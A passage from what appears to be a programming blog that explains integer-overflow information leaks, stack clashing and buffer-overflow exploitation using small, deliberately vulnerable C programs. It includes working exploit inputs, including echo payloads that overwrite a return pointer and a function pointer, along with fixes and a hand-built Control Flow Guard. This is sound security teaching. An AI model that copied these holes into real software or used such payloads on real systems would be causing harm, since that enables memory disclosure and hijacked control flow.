5. Place all cards back in the deck, shuffle, and repeat from step 2 until you have the desired number of words. Each word is worth 12.4 bits of entropy.

A word of warning about step 4: If you use software to do the word list lookup, beware that it might save your search/command history — and therefore your passphrase — to a file. For example, the less pager will store search history in ~/.lesshst. It’s easy to prevent that one:

$ LESSHISTFILE=- less pokerware-slang.txt

Example word generation

Suppose in step 2 you draw King of Hearts (KH/K♥) and Queen of Clubs (QC/Q♣).

In step 3 you first draw King of Diamonds (KD/K♦), discarding it because it matches the face value of one of your cards from step 2.

Next you draw Four of Spades (4S/4♠), taking spades as your extra suit.

In order, this gives you Queen of Clubs, King of Hearts, and Spades: QCKHS or Q♣K♥♠. This corresponds to “wizard” in the formal word list and would be the first word in your passphrase.

A deck of cards as an office tool

I now have an excuse to keep a deck of cards out on my desk at work. I’ve been using Diceware, or something approximating it, since I’m not so paranoid about hardware RNGs. From now on I’ll deal new passwords from an in-reach deck of cards, though typically I need to tweak the results to meet outdated character-composition requirements.

Integer Overflow into Information Disclosure

2017-07-19T01:57:36Z

Last week I was discussing CVE-2017-7529 with my intern. Specially crafted input to Nginx causes an integer overflow which has the potential to leak sensitive information. But how could an integer overflow be abused to trick a program into leaking information? To answer this question, I put together the simplest practical example I could imagine.

https://github.com/skeeto/integer-overflow-demo

This small C program converts a vector image from a custom format (described below) into a Netpbm image, a conveniently simple format. The program defensively and carefully parses its input, but still makes a subtle, fatal mistake. This mistake not only leads to sensitive information disclosure, but, with a more sophisticated attack, could be used to execute arbitrary code.

After getting the hang of the interface for the program, I encourage you to take some time to work out an exploit yourself. Regardless, I’ll reveal a functioning exploit and explain how it works.

A new vector format

The input format is line-oriented and very similar to Netpbm itself. The first line is the header, starting with the magic number V2 (ASCII) followed by the image dimensions. The target output format is Netpbm’s “P2” (text gray scale) format, so the “V2” parallels it. The file must end with a newline.

V2 <width> <height>

What follows is drawing commands, one per line. For example, the s command sets the value of a particular pixel.

s <x> <y> <00–ff>

Since it’s not important for the demonstration, this is the only command I implemented. It’s easy to imagine additional commands to draw lines, circles, Bezier curves, etc.

Here’s an example (example.txt) that draws a single white point in the middle of the image:

V2 256 256
s 127 127 ff

The rendering tool reads from standard input and writes to standard output:

$ render < example.txt > example.pgm

Here’s what it looks like rendered:

However, you will notice that when you run the rendering tool, it prompts you for a username and password. This is silly, of course, but it’s an excuse to get “sensitive” information into memory. It will accept any username/password combination where the username and password don’t match each other. The key is this: It’s possible to craft a valid image that leaks the entered password.

Tour of the implementation

Without spoiling anything yet, let’s look at how this program works. The first thing to notice is that I’m using a custom “obstack” allocator instead of malloc() and free(). Real-world allocators have some defenses against this particular vulnerability. Plus a specific exploit would have to target a specific libc. By using my own allocator, the exploit will mostly be portable, making for a better and easier demonstration.

The allocator interface should be pretty self-explanatory, except for two details. This is an obstack allocator, so freeing an object also frees every object allocated after it. Also, it doesn’t call malloc() in the background. At initialization you give it a buffer from which to allocate all memory.

struct mstack {
    char *top;
    char *max;
    char buf[];
};

struct mstack *mstack_init(void *, size_t);
void          *mstack_alloc(struct mstack *, size_t);
void           mstack_free(struct mstack *, void *);

There are no vulnerabilities in these functions (I hope!). It’s just here for predictability.

Next here’s the “authentication” function. It reads a username and password combination from /dev/tty. It’s only an excuse to get a flag in memory for this capture-the-flag game. The username and password must be less than 32 characters each.

int
authenticate(struct mstack *m)
{
    FILE *tty = fopen("/dev/tty", "r+");
    if (!tty) {
        perror("/dev/tty");
        return 0;
    }

    char *user = mstack_alloc(m, 32);
    if (!user) {
        fclose(tty);
        return 0;
    }
    fputs("User: ", tty);
    fflush(tty);
    if (!fgets(user, 32, tty))
        user[0] = 0;

    char *pass = mstack_alloc(m, 32);
    int result = 0;
    if (pass) {
        fputs("Password: ", tty);
        fflush(tty);
        if (fgets(pass, 32, tty))
            result = strcmp(user, pass) != 0;
    }

    fclose(tty);
    mstack_free(m, user);
    return result;
}

Next here’s a little version of calloc() for the custom allocator. Hmm, I wonder why this is called “naive”…

void *
naive_calloc(struct mstack *m, unsigned long nmemb, unsigned long size)
{
    void *p = mstack_alloc(m, nmemb * size);
    if (p)
        memset(p, 0, nmemb * size);
    return p;
}

Next up is a paranoid wrapper for strtoul() that defensively checks its inputs. If it’s out of range of an unsigned long, it bails out. If there’s trailing garbage, it bails out. If there’s no number at all, it bails out. If you make prolonged eye contact, it bails out.

unsigned long
safe_strtoul(char *nptr, char **endptr, int base)
{
    errno = 0;
    unsigned long n = strtoul(nptr, endptr, base);
    if (errno) {
        perror(nptr);
        exit(EXIT_FAILURE);
    } else if (nptr == *endptr) {
        fprintf(stderr, "Expected an integer\n");
        exit(EXIT_FAILURE);
    } else if (!isspace(**endptr)) {
        fprintf(stderr, "Invalid character '%c'\n", **endptr);
        exit(EXIT_FAILURE);
    }
    return n;
}

The main() function parses the header using this wrapper and allocates some zeroed memory:

    unsigned long width = safe_strtoul(p, &p, 10);
    unsigned long height = safe_strtoul(p, &p, 10);
    unsigned char *pixels = naive_calloc(m, width, height);
    if (!pixels) {
        fputs("Not enough memory\n", stderr);
        exit(EXIT_FAILURE);
    }

Then there’s a command processing loop, also using safe_strtoul(). It carefully checks bounds against width and height. Finally it writes the image out in Netpbm’s P2 (.pgm) format.

    printf("P2\n%lu %lu 255\n", width, height);
    for (unsigned long y = 0; y < height; y++) {
        for (unsigned long x = 0; x < width; x++)
            printf("%d ", pixels[y * width + x]);
        putchar('\n');
    }

The vulnerability is in something I’ve shown above. Can you find it?

Exploiting the renderer

Did you find it? If you’re on a platform with 64-bit long, here’s your exploit:

V2 16 1152921504606846977

And here’s an exploit for 32-bit long:

V2 16 268435457

Here’s how it looks in action. The most obvious result is that the program crashes:

$ echo V2 16 1152921504606846977 | ./mstack > capture.txt
User: coolguy
Password: mysecret
Segmentation fault

Here are the initial contents of capture.txt:

P2
16 1152921504606846977 255
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
109 121 115 101 99 114 101 116 10 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

Where did those junk numbers come from in the image data? Plug them into an ASCII table and you’ll get “mysecret”. Despite allocating the image with naive_calloc(), the password has found its way into the image! How could this be?

What happened is that width * height overflows an unsigned long. (Well, technically speaking, unsigned integers are defined not to overflow in C, wrapping around instead, but it’s really the same thing.) In naive_calloc(), the overflow results in a value of 16, so it only allocates and clears 16 bytes. The requested allocation “succeeds” despite far exceeding the available memory. The caller has been given a lot less memory than expected, and the memory believed to have been allocated contains a password.

The final part that writes the output doesn’t multiply the integers and doesn’t need to test for overflow. It uses a nested loop instead, continuing along with the original, impossible image size.

How do we fix this? Add an overflow check at the beginning of the naive_calloc() function (making it no longer naive). This is what the real calloc() does.

    if (nmemb && size > -1UL / nmemb)
        return 0;

The frightening takeaway is that this check is very easy to forget. It’s a subtle bug with potentially disastrous consequences.

In practice, this sort of program wouldn’t have sensitive data resident in memory. Instead an attacker would target the program’s stack with those s commands (specifically the return pointers) and perform a ROP attack against the application. With the exploit header above and a platform where long is the same size as size_t, the program will behave as if all available memory has been allocated to the image, so the s command could be used to poke custom values anywhere in memory. This is a much more complicated exploit, and it has to contend with ASLR and random stack gap, but it’s feasible.

Stack Clashing for Fun and Profit

2017-06-21T05:28:56Z

Stack clashing has been in the news lately due to some recently discovered vulnerabilities along with proof-of-concept exploits. As the announcement itself notes, this is not a new issue, though this appears to be the first time it’s been given this particular name. I do know of one “good” use of stack clashing, where it’s used for something productive rather than as part of an attack. In this article I’ll explain how it works.

You can find the complete code for this article here, ready to run:

https://github.com/skeeto/stack-clash-coroutine

But first, what is a stack clash? Here’s a rough picture of the typical way process memory is laid out. The stack starts at a high memory address and grows downwards. Code and static data sit at low memory, with a brk pointer growing upward to make small allocations. In the middle is the heap, where large allocations and memory mappings take place.

Below the stack is a slim guard page that divides the stack and the region of memory reserved for the heap. Reading or writing to that memory will trap, causing the program to crash or some special action to be taken. The goal is to prevent the stack from growing into the heap, which could cause all sorts of trouble, like security issues.

The problem is that this thin guard page isn’t enough. It’s possible to put a large allocation on the stack, never read or write to it, and completely skip over the guard page, such that the heap and stack overlap without detection.

Once this happens, writes into the heap will change memory on the stack and vice versa. If an attacker can cause the program to make such a large allocation on the stack, then legitimate writes into memory on the heap can manipulate local variables or return pointers, changing the program’s control flow. This can bypass buffer overflow protections, such as stack canaries.

Binary trees and coroutines

Now, I’m going to abruptly change topics to discuss binary search trees. We’ll get back to stack clash in a bit. Suppose we have a binary tree which we would like to iterate depth-first. For this demonstration, here’s the C interface to the binary tree.

struct tree {
    struct tree *left;
    struct tree *right;
    char *key;
    char *value;
};

void  tree_insert(struct tree **, char *k, char *v);
char *tree_find(struct tree *, char *k);
void  tree_visit(struct tree *, void (*f)(char *, char *));
void  tree_destroy(struct tree *);

An empty tree is the NULL pointer, hence the double-pointer for insert. In the demonstration it’s an unbalanced search tree, but this could very well be a balanced search tree with the addition of another field on the structure.

For the traversal, first visit the root node, then traverse its left tree, and finally traverse its right tree. It makes for a simple, recursive definition — the sort of thing you’d teach a beginner. Here’s a definition that accepts a callback, which the caller will use to visit each key/value in the tree. This really is as simple as it gets.

void
tree_visit(struct tree *t, void (*f)(char *, char *))
{
    if (t) {
        f(t->key, t->value);
        tree_visit(t->left, f);
        tree_visit(t->right, f);
    }
}

Unfortunately this isn’t so convenient for the caller, who has to split off a callback function that lacks context, then hand over control to the traversal function.

void
printer(char *k, char *v)
{
    printf("%s = %s\n", k, v);
}

void
print_tree(struct tree *tree)
{
    tree_visit(tree, printer);
}

Usually it’s much nicer for the caller if instead it’s provided an iterator, which the caller can invoke at will. Here’s an interface for it, just two functions.

struct tree_it *tree_iterator(struct tree *);
int             tree_next(struct tree_it *, char **k, char **v);

The first constructs an iterator object, and the second one visits a key/value pair each time it’s called. It returns 0 when traversal is complete, automatically freeing any resources associated with the iterator.

The caller now looks like this:

    char *k, *v;
    struct tree_it *it = tree_iterator(tree);
    while (tree_next(it, &k, &v))
        printf("%s = %s\n", k, v);

Notice I haven’t defined struct tree_it. That’s because I’ve got four different implementations, each taking a different approach. The last one will use stack clashing.

Manual State Tracking

With just the standard facilities provided by C, there’s some manual bookkeeping that has to take place in order to convert the recursive definition into an iterator. Depth-first traversal is a stack-oriented process, and with recursion the stack is implicit in the call stack. As an iterator, the traversal stack needs to be managed explicitly. The iterator needs to keep track of the path it took so that it can backtrack, which means keeping track of parent nodes as well as which branch was taken.

Here’s my little implementation, which, to keep things simple, has a hard depth limit of 32. Its structure definition includes a stack of node pointers and 2 bits of information per visited node, stored across a 64-bit integer.

struct tree_it {
    struct tree *stack[32];
    unsigned long long state;
    int nstack;
};

struct tree_it *
tree_iterator(struct tree *t)
{
    struct tree_it *it = malloc(sizeof(*it));
    it->stack[0] = t;
    it->state = 0;
    it->nstack = 1;
    return it;
}

The 2 bits track three different states for each visited node:

Visit the current node
Traverse the left tree
Traverse the right tree

It works out to the following. Don’t worry too much about trying to understand how this works. My point is to demonstrate that converting the recursive definition into an iterator complicates the implementation.

int
tree_next(struct tree_it *it, char **k, char **v)
{
    while (it->nstack) {
        int shift = (it->nstack - 1) * 2;
        int state = 3u & (it->state >> shift);
        struct tree *t = it->stack[it->nstack - 1];
        it->state += 1ull << shift;
        switch (state) {
            case 0:
                *k = t->key;
                *v = t->value;
                if (t->left) {
                    it->stack[it->nstack++] = t->left;
                    it->state &= ~(3ull << (shift + 2));
                }
                return 1;
            case 1:
                if (t->right) {
                    it->stack[it->nstack++] = t->right;
                    it->state &= ~(3ull << (shift + 2));
                }
                break;
            case 2:
                it->nstack--;
                break;
        }
    }
    free(it);
    return 0;
}

Wouldn’t it be nice to keep both the recursive definition while also getting an iterator? There’s an exact solution to that: coroutines.

Coroutines

C doesn’t come with coroutines, but there are a number of libraries available. We can also build our own coroutines. One way to do that is with user contexts (<ucontext.h>) provided by the X/Open System Interfaces Extension (XSI), an extension to POSIX. This set of functions allows programs to create their own call stacks and switch between them. That’s the key ingredient for coroutines. Caveat: These functions aren’t widely available, and probably shouldn’t be used in new code.

Here’s my iterator structure definition.

#define _XOPEN_SOURCE 600
#include <ucontext.h>

struct tree_it {
    char *k;
    char *v;
    ucontext_t coroutine;
    ucontext_t yield;
};

It needs one context for the original stack and one context for the iterator’s stack. Each time the iterator is invoked, the program will switch to the other stack, find the next value, then switch back. This process is called yielding. Values are passed between contexts using the k (key) and v (value) fields on the iterator.

Before I get into initialization, here’s the actual traversal coroutine. It’s nearly the same as the original recursive definition except for the swapcontext(). This is the yield, pausing execution and sending control back to the caller. The current context is saved in the first argument, and the second argument becomes the current context.

static void
coroutine(struct tree *t, struct tree_it *it)
{
    if (t) {
        it->k = t->key;
        it->v = t->value;
        swapcontext(&it->coroutine, &it->yield);
        coroutine(t->left, it);
        coroutine(t->right, it);
    }
}

While the actual traversal is simple again, initialization is more complicated. The first problem is that there’s no way to pass pointer arguments to the coroutine. Technically only int arguments are permitted. (All the online tutorials get this wrong.) To work around this problem, I smuggle the arguments in as global variables. This would cause problems should two different threads try to create iterators at the same time, even on different trees.

static struct tree *tree_arg;
static struct tree_it *tree_it_arg;

static void
coroutine_init(void)
{
    coroutine(tree_arg, tree_it_arg);
}

The stack has to be allocated manually, which I do with a call to malloc(). Nothing fancy is needed, though this means the new stack won’t have a guard page. For the stack size, I use the suggested value of SIGSTKSZ. The makecontext() function is what creates the new context from scratch, but the new context must first be initialized with getcontext(), even though that particular snapshot won’t actually be used.

struct tree_it *
tree_iterator(struct tree *t)
{
    struct tree_it *it = malloc(sizeof(*it));
    getcontext(&it->coroutine);
    it->coroutine.uc_stack.ss_sp = malloc(SIGSTKSZ);
    it->coroutine.uc_stack.ss_size = SIGSTKSZ;
    it->coroutine.uc_link = &it->yield;
    makecontext(&it->coroutine, coroutine_init, 0);
    tree_arg = t;
    tree_it_arg = it;
    return it;
}

Notice I gave it a function pointer, a lot like I’m starting a new thread. This is no coincidence. There’s a lot of similarity between coroutines and multiple threads, as you’ll soon see.

Finally the iterator function itself. Since NULL isn’t a valid key, it initializes the key to NULL before yielding to the iterator context. If the iterator has no more nodes to visit, it doesn’t set the key, which can be detected when control returns.

int
tree_next(struct tree_it *it, char **k, char **v)
{
    it->k = 0;
    swapcontext(&it->yield, &it->coroutine);
    if (it->k) {
        *k = it->k;
        *v = it->v;
        return 1;
    } else {
        free(it->coroutine.uc_stack.ss_sp);
        free(it);
        return 0;
    }
}

That’s all it takes to create and operate a coroutine in C, provided you’re on a system with these XSI extensions.

Semaphores

Instead of a coroutine, we could just use actual threads and a couple of semaphores to synchronize them. This is a heavy implementation and also probably shouldn’t be used in practice, but at least it’s fully portable.

Here’s the structure definition:

struct tree_it {
    struct tree *t;
    char *k;
    char *v;
    sem_t visitor;
    sem_t main;
    pthread_t thread;
};

The main thread will wait on one semaphore and the iterator thread will wait on the other. This should sound very familiar.

The actual traversal function looks the same, but with sem_post() and sem_wait() as the yield.

static void
visit(struct tree *t, struct tree_it *it)
{
    if (t) {
        it->k = t->key;
        it->v = t->value;
        sem_post(&it->main);
        sem_wait(&it->visitor);
        visit(t->left, it);
        visit(t->right, it);
    }
}

There’s a separate function to initialize the iterator context again.

static void *
thread_entrance(void *arg)
{
    struct tree_it *it = arg;
    sem_wait(&it->visitor);
    visit(it->t, it);
    sem_post(&it->main);
    return 0;
}

Creating the iterator only requires initializing the semaphores and creating the thread:

struct tree_it *
tree_iterator(struct tree *t)
{
    struct tree_it *it = malloc(sizeof(*it));
    it->t = t;
    sem_init(&it->visitor, 0, 0);
    sem_init(&it->main, 0, 0);
    pthread_create(&it->thread, 0, thread_entrance, it);
    return it;
}

The iterator function looks just like the coroutine version.

int
tree_next(struct tree_it *it, char **k, char **v)
{
    it->k = 0;
    sem_post(&it->visitor);
    sem_wait(&it->main);
    if (it->k) {
        *k = it->k;
        *v = it->v;
        return 1;
    } else {
        pthread_join(it->thread, 0);
        sem_destroy(&it->main);
        sem_destroy(&it->visitor);
        free(it);
        return 0;
    }
}

Overall, this is almost identical to the coroutine version.

Coroutines using stack clashing

Finally I can tie this back into the topic at hand. Without either XSI extensions or Pthreads, we can (usually) create coroutines by abusing setjmp() and longjmp(). Technically this violates two of C’s rules and relies on undefined behavior, but it generally works. This is not my own invention, and it dates back to at least 2010.

From the very beginning, C has provided a crude “exception” mechanism that allows the stack to be abruptly unwound back to a previous state. It’s a sort of non-local goto. Call setjmp() to capture an opaque jmp_buf object to be used in the future. This function returns 0 the first time. Hand that value to longjmp() later, even in a different function, and setjmp() will return again, this time with a non-zero value.

It’s technically unsuitable for coroutines because the jump is a one-way trip. The unwound stack invalidates any jmp_buf that was created after the target of the jump. In practice, though, you can still use these jumps, which is one rule being broken.

That’s where stack clashing comes into play. In order for it to be a proper coroutine, it needs to have its own stack. But how can we do that with these primitive C utilities? Extend the stack to overlap the heap, call setjmp() to capture a coroutine on it, then return. Generally we can get away with using longjmp() to return to this heap-allocated stack.

Here’s my iterator definition for this one. Like the XSI context struct, this has two jmp_buf “contexts.” The stack field holds the iterator’s stack buffer so that it can be freed, and the gap field will be used to prevent the optimizer from spoiling our plans.

struct tree_it {
    char *k;
    char *v;
    char *stack;
    volatile char *gap;
    jmp_buf coroutine;
    jmp_buf yield;
};

The coroutine looks familiar again. This time the yield is performed with setjmp() and longjmp(), just like swapcontext(). Remember that setjmp() returns twice, hence the branch. The longjmp() never returns.

static void
coroutine(struct tree *t, struct tree_it *it)
{
    if (t) {
        it->k = t->key;
        it->v = t->value;
        if (!setjmp(it->coroutine))
            longjmp(it->yield, 1);
        coroutine(t->left, it);
        coroutine(t->right, it);
    }
}

Next is the tricky part to cause the stack clash. First, allocate the new stack with malloc() so that we can get its address. Then use a local variable on the stack to determine how much the stack needs to grow in order to overlap with the allocation. Taking the difference between these pointers is illegal as far as the language is concerned, making this the second rule I’m breaking. I can imagine an implementation where the stack and heap are in two separate kinds of memory, and it would be meaningless to take the difference. I don’t actually have to imagine very hard, because this is actually how it used to work on the 8086 with its segmented memory architecture.

struct tree_it *
tree_iterator(struct tree *t)
{
    struct tree_it *it = malloc(sizeof(*it));
    it->stack = malloc(STACK_SIZE);
    char marker;
    char gap[&marker - it->stack - STACK_SIZE];
    it->gap = gap; // prevent optimization
    if (!setjmp(it->yield))
        coroutine_init(t, it);
    return it;
}

I’m using a variable-length array (VLA) named gap to indirectly control the stack pointer, moving it over the heap. I’m assuming the stack grows downward, since otherwise the sign would be wrong.

The compiler is smart and will notice I’m not actually using gap, and it’s happy to throw it away. In fact, it’s vitally important that I don’t touch it since the guard page, along with a bunch of unmapped memory, is actually somewhere in the middle of that array. I only want the array for its side effect, but that side effect isn’t officially supported, which means the optimizer doesn’t need to consider it in its decisions. To inhibit the optimizer, I store the array’s address where someone might potentially look at it, meaning the array has to exist.

Finally, the iterator function looks just like the others, again.

int
tree_next(struct tree_it *it, char **k, char **v)
{
    it->k = 0;
    if (!setjmp(it->yield))
        longjmp(it->coroutine, 1);
    if (it->k) {
        *k = it->k;
        *v = it->v;
        return 1;
    } else {
        free(it->stack);
        free(it);
        return 0;
    }
}

And that’s it: a nasty hack using a stack clash to create a context for a setjmp()+longjmp() coroutine.

Manual Control Flow Guard in C

2017-01-21T22:44:15Z

Recent versions of Windows have a new exploit mitigation feature called Control Flow Guard (CFG). Before an indirect function call (e.g. through function pointers and virtual functions) the target address is checked against a table of valid call addresses. If the address isn’t the entry point of a known function, then the program is aborted.

If an application has a buffer overflow vulnerability, an attacker may use it to overwrite a function pointer and, by the call through that pointer, control the execution flow of the program. This is one way to initiate a Return Oriented Programming (ROP) attack, where the attacker constructs a chain of gadget addresses — a gadget being a couple of instructions followed by a return instruction, all in the original program — using the indirect call as the starting point. The execution then flows from gadget to gadget so that the program does what the attacker wants it to do, all without the attacker supplying any code.

The two most widely practiced ROP attack mitigation techniques today are Address Space Layout Randomization (ASLR) and stack protectors. The former randomizes the base address of executable images (programs, shared libraries) so that process memory layout is unpredictable to the attacker. The addresses in the ROP attack chain depend on the run-time memory layout, so the attacker must also find and exploit an information leak to bypass ASLR.

For stack protectors, the compiler allocates a canary on the stack above other stack allocations and sets the canary to a per-thread random value. If a buffer overflows to overwrite the function return pointer, the canary value will also be overwritten. Before the function returns by the return pointer, it checks the canary. If the canary doesn’t match the known value, the program is aborted.

CFG works similarly, performing a check prior to passing control to the address in a pointer, except that instead of checking a canary, it checks the target address itself. This is a lot more sophisticated, and, unlike a stack canary, essentially requires coordination by the platform. The check must be informed of all valid call targets, whether from the main program or from shared libraries.

While not (yet?) widely deployed, a worthy mention is Clang’s SafeStack. Each thread gets two stacks: a “safe stack” for return pointers and other safely-accessed values, and an “unsafe stack” for buffers and such. Buffer overflows will corrupt other buffers but will not overwrite return pointers, limiting the effect of their damage.

An exploit example

Consider this trivial C program, demo.c:

int
main(void)
{
    char name[8];
    gets(name);
    printf("Hello, %s.\n", name);
    return 0;
}

It reads a name into a buffer and prints it back out with a greeting. While trivial, it’s far from innocent. That naive call to gets() doesn’t check the bounds of the buffer, introducing an exploitable buffer overflow. It’s so obvious that both the compiler and linker will yell about it.

For simplicity, suppose the program also contains a dangerous function.

void
self_destruct(void)
{
    puts("**** GO BOOM! ****");
}

The attacker can use the buffer overflow to call this dangerous function.

To make this attack simpler for the sake of the article, assume the program isn’t using ASLR (e.g. without -fpie/-pie, or with -fno-pie/-no-pie). For this particular example, I’ll also explicitly disable buffer overflow protections (e.g. _FORTIFY_SOURCE and stack protectors).

$ gcc -Os -fno-pie -D_FORTIFY_SOURCE=0 -fno-stack-protector \
      -o demo demo.c

First, find the address of self_destruct().

$ readelf -a demo | grep self_destruct
46: 00000000004005c5  10 FUNC  GLOBAL DEFAULT 13 self_destruct

This is on x86-64, so it’s a 64-bit address. The size of the name buffer is 8 bytes, and peeking at the assembly I see an extra 8 bytes allocated above, so there’s 16 bytes to fill, then 8 bytes to overwrite the return pointer with the address of self_destruct.

$ echo -ne 'xxxxxxxxyyyyyyyy\xc5\x05\x40\x00\x00\x00\x00\x00' > boom
$ ./demo < boom
Hello, xxxxxxxxyyyyyyyy?@.
**** GO BOOM! ****
Segmentation fault
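The same payload could be generated by a few lines of C rather than echo. This is only a sketch: build_payload() is a name I made up for illustration, and it assumes the 16 bytes of filler and the little-endian 64-bit address described above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Build the overflow payload: `fill` filler bytes followed by the
 * 64-bit target address in little-endian byte order, as x86-64
 * expects. Returns the number of bytes written to out (fill + 8).
 * The caller must supply a buffer of at least fill + 8 bytes. */
size_t
build_payload(unsigned char *out, size_t fill, uint64_t target)
{
    memset(out, 'x', fill);
    for (int i = 0; i < 8; i++)
        out[fill + i] = (unsigned char)(target >> (8 * i));
    return fill + 8;
}
```

Calling build_payload(buf, 16, 0x4005c5) and writing the 24 resulting bytes to a file gives the equivalent of boom, except that all of the filler is "x".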

With this input I’ve successfully exploited the buffer overflow to divert control to self_destruct(). When main tries to return into libc, it instead jumps to the dangerous function, and then crashes when that function tries to return — though, presumably, the system would have self-destructed already. Turning on the stack protector stops this exploit.

$ gcc -Os -fno-pie -D_FORTIFY_SOURCE=0 -fstack-protector \
      -o demo demo.c
$ ./demo < boom
Hello, xxxxxxxxyyyyyyyy?@.
*** stack smashing detected ***: ./demo terminated
======= Backtrace: =========
... lots of backtrace stuff ...

The stack protector successfully blocks the exploit. To get around this, I’d have to either guess the canary value or discover an information leak that reveals it.

The stack protector transformed the program into something that looks like the following:

int
main(void)
{
    long __canary = __get_thread_canary();
    char name[8];
    gets(name);
    printf("Hello, %s.\n", name);
    if (__canary != __get_thread_canary())
        abort();
    return 0;
}

However, it’s not actually possible to implement the stack protector within C. Buffer overflows are undefined behavior, and a canary is only affected by a buffer overflow, allowing the compiler to optimize it away.

Function pointers and virtual functions

After the attacker successfully self-destructed the last computer, upper management has mandated password checks before all self-destruction procedures. Here’s what it looks like now:

void
self_destruct(char *password)
{
    if (strcmp(password, "12345") == 0)
        puts("**** GO BOOM! ****");
}

The password is hardcoded, and it’s the kind of thing an idiot would have on his luggage, but assume it’s actually unknown to the attacker. Especially since, as I’ll show shortly, it won’t matter. Upper management has also mandated stack protectors, so assume that’s enabled from here on.

Additionally, the program has evolved a bit, and now uses a function pointer for polymorphism.

struct greeter {
    char name[8];
    void (*greet)(struct greeter *);
};

void
greet_hello(struct greeter *g)
{
    printf("Hello, %s.\n", g->name);
}

void
greet_aloha(struct greeter *g)
{
    printf("Aloha, %s.\n", g->name);
}

There’s now a greeter object and the function pointer makes its behavior polymorphic. Think of it as a hand-coded virtual function for C. Here’s the new (contrived) main:

int
main(void)
{
    struct greeter greeter = {.greet = greet_hello};
    gets(greeter.name);
    greeter.greet(&greeter);
    return 0;
}

(In a real program, something else provides greeter and picks its own function pointer for greet.)

Rather than overwriting the return pointer, the attacker has the opportunity to overwrite the function pointer on the struct. Let’s reconstruct the exploit like before.

$ readelf -a demo | grep self_destruct
54: 00000000004006a5  10 FUNC  GLOBAL DEFAULT  13 self_destruct

We don’t know the password, but we do know (from peeking at the disassembly) that the password check is 16 bytes. The attack should instead jump 16 bytes into the function, skipping over the check (0x4006a5 + 16 = 0x4006b5).

$ echo -ne 'xxxxxxxx\xb5\x06\x40\x00\x00\x00\x00\x00' > boom
$ ./demo < boom
**** GO BOOM! ****

Neither the stack protector nor the password was of any help. The stack protector only protects the return pointer, not the function pointer on the struct.

This is where the Control Flow Guard comes into play. With CFG enabled, the compiler inserts a check before calling the greet() function pointer. It must point to the beginning of a known function, otherwise it will abort just like the stack protector. Since the middle of self_destruct() isn’t the beginning of a function, it would abort if this exploit is attempted.

However, I’m on Linux and there’s no CFG on Linux (yet?). So I’ll implement it myself, with manual checks.

Function address bitmap

As described in the PDF linked at the top of this article, CFG on Windows is implemented using a bitmap. Each bit in the bitmap represents 8 bytes of memory. If those 8 bytes contain the beginning of a function, the bit will be set to one. Checking a pointer means checking its associated bit in the bitmap.

For my CFG, I’ve decided to keep the same 8-byte resolution: the bottom three bits of the target address will be dropped. The next 24 bits will be used to index into the bitmap. All other bits in the pointer will be ignored. A 24-bit bit index means the bitmap will only be 2MB.

These 24 bits are perfectly sufficient for 32-bit systems, but it means on 64-bit systems there may be false positives: some addresses will not represent the start of a function, but will have their bit set to 1. This is acceptable, especially because only functions known to be targets of indirect calls will be registered in the table, reducing the false positive rate.

Note: Relying on the bits of a pointer cast to an integer is unspecified and isn’t portable, but this implementation will work fine anywhere I would care to use it.

Here are the CFG parameters. I’ve made them macros so that they can easily be tuned at compile-time. The cfg_bits is the integer type backing the bitmap array. The CFG_RESOLUTION is the number of bits dropped, so “3” is a granularity of 8 bytes.

typedef unsigned long cfg_bits;
#define CFG_RESOLUTION  3
#define CFG_BITS        24

Given a function pointer f, this macro extracts the bitmap index.

#define CFG_INDEX(f) \
    (((uintptr_t)(f) >> CFG_RESOLUTION) & ((1UL << CFG_BITS) - 1))
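To make the index arithmetic concrete, here is the same computation as a function on a plain integer address, so it can be tried on the addresses from the readelf output. The name cfg_index_of() is mine, purely for illustration.

```c
#include <stdint.h>

#define CFG_RESOLUTION  3
#define CFG_BITS        24

/* Same computation as CFG_INDEX, but taking an integer address
 * instead of a pointer: drop the low CFG_RESOLUTION bits, then keep
 * the next CFG_BITS bits. */
unsigned long
cfg_index_of(uint64_t addr)
{
    return (unsigned long)((addr >> CFG_RESOLUTION) &
                           ((UINT64_C(1) << CFG_BITS) - 1));
}
```

The start of self_destruct() at 0x4006a5 maps to bit 0x800d4, while the exploit's target at 0x4006b5 maps to bit 0x800d6, so the two are distinguishable. On the other hand, an address exactly 128MB higher (0x4006a5 + 2^27) also maps to bit 0x800d4, which is the kind of false positive a 64-bit address space allows.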

The CFG bitmap is just an array of integers. Zero it to initialize.

struct cfg {
    cfg_bits bitmap[(1UL << CFG_BITS) / (sizeof(cfg_bits) * CHAR_BIT)];
};

Functions are manually registered in the bitmap using cfg_register().

void
cfg_register(struct cfg *cfg, void *f)
{
    unsigned long i = CFG_INDEX(f);
    size_t z = sizeof(cfg_bits) * CHAR_BIT;
    cfg->bitmap[i / z] |= 1UL << (i % z);
}

Because functions are registered at run-time, it’s fully compatible with ASLR. If ASLR is enabled, the bitmap will be a little different each run. On the same note, it may be worth XORing each bitmap element with a random, run-time value — along the same lines as the stack canary value — to make it harder for an attacker to manipulate the bitmap should he get the ability to overwrite it by a vulnerability. Alternatively the bitmap could be switched to read-only (e.g. mprotect()) once everything is registered.

And finally, the check function, used immediately before indirect calls. It ensures f was previously passed to cfg_register() (except for false positives, as discussed). Since it will be invoked often, it needs to be fast and simple.

void
cfg_check(struct cfg *cfg, void *f)
{
    unsigned long i = CFG_INDEX(f);
    size_t z = sizeof(cfg_bits) * CHAR_BIT;
    if (!((cfg->bitmap[i / z] >> (i % z)) & 1))
        abort();
}

And that’s it! Now augment main to make use of it:

struct cfg cfg;

int
main(void)
{
    cfg_register(&cfg, self_destruct);  // to prove this works
    cfg_register(&cfg, greet_hello);
    cfg_register(&cfg, greet_aloha);

    struct greeter greeter = {.greet = greet_hello};
    gets(greeter.name);
    cfg_check(&cfg, greeter.greet);
    greeter.greet(&greeter);
    return 0;
}

And now attempting the exploit:

$ ./demo < boom
Aborted

Normally self_destruct() wouldn’t be registered since it’s not a legitimate target of an indirect call, but the exploit still didn’t work because it called into the middle of self_destruct(), which isn’t a valid address in the bitmap. The check aborts the program before it can be exploited.

In a real application I would have a global cfg bitmap for the whole program, and define cfg_check() in a header as an inline function.

Despite being possible to implement in straight C without the help of the toolchain, it would be far less cumbersome and error-prone to let the compiler and platform handle Control Flow Guard. That’s the right place to implement it.

